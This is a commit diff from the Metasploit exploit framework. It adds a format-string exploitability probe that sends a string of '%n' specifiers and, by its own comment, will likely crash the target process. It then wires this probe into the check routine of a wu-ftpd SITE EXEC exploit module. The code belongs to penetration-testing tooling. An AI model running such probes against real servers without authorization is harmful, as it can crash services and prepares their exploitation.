add exploitability detection (by trying %n)

git-svn-id: file:///home/svn/framework3/trunk@7791 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/exploit/fmtstr.rb

@@ -69,6 +69,22 @@ module Exploit::FormatString
 		return false
 	end
 	
+	# NOTE: This will likely crash the target process
+	def fmtstr_detect_exploitable
+		begin
+			res = trigger_fmt("|" + ("%n" * 16) + "|")
+		rescue ::Exception
+			res = nil
+		end
+		return true if not res
+		res = extract_fmt_output(res)
+		if res =~ /^\|\|$/
+			return true
+		end
+		return false
+	end
+	
+	
 	#
 	# Generates a format string that will perform an arbitrary write using
 	# two separate short values

modules/exploits/multi/ftp/wuftpd_site_exec_format.rb

@@ -124,6 +124,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		if not fmtstr_detect_vulnerable
 			status = Exploit::CheckCode::Safe
 		end
+		if not fmtstr_detect_exploitable
+			status = Exploit::CheckCode::Safe
+		end
 		disconnect
 		return status
 	end